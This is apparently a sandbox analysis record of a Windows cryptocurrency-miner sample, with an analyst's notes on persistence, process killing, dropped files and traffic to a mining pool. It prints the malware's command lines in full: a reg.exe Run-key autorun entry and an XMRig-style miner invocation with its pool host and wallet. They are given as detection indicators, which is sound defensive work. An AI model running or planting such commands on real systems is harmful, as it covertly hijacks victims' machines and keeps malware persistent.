Technical Information
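Persistence: an autorun value is set under the current user's Run key, so the binary starts at each logon:
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'AppDatas.exe' = '<SYSTEM32>\AppDatas.exe'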
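Process termination: taskkill is run with /F (force) against the named images; /T also ends their child processes:
- '<SYSTEM32>\taskkill.exe' /F /IM AppData.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM AppDatas.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM <File name>.exe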
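File system: the extract has lost the original heading for these paths. They are presumably files the sample drops, since each one is executed or registered for autorun elsewhere in this list:
- <Current directory>\Kill.bat
- <SYSTEM32>\AppDatas.exe
- <Current directory>\cmd.bat
- <SYSTEM32>\VC6linker.exe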
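Network activity: an outbound connection on port 443 and a DNS query. The host is partly masked here as 'mi##'; it appears to be the same host that the miner command line below gives in full:
- 'mi##.ppxxmr.com':443
- DNS ASK mi##.ppxxmr.com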
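Window lookup: presumably a FindWindow-style search; both the class name and the window name are empty in this record:
- ClassName: '' WindowName: ''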
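Processes launched: the VC6linker.exe command line is a coin miner invocation. Its stratum+tcp pool URL, -u wallet address, and --max-cpu-usage and --donate-level options match XMRig-style miner syntax, so the file name does not reflect what the binary does. The reg.exe call writes the Run-key autorun value shown above. The pool host, the wallet string and these command lines are the most specific detection pivots in this record:
- '<SYSTEM32>\AppDatas.exe'
- '<SYSTEM32>\VC6linker.exe' -B -o stratum+tcp://mine.ppxxmr.com:443 -u 43VZF7BUbP2CLYGC6CGo6iMSWtCHtkTmLF5Hy7Trkd59G1ZoSuKUjp5ij9942shw9X3Pdx36r2kMLaAuZT4BXp1DSjBrrJT -p x -k --max-cpu-usage=100 --donate-level=1
- '<SYSTEM32>\cmd.exe' /c Kill.bat
- '<SYSTEM32>\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "AppDatas.exe" /t REG_SZ /d "<SYSTEM32>\AppDatas.exe" /f
- '<SYSTEM32>\cmd.exe' /c cmd.bat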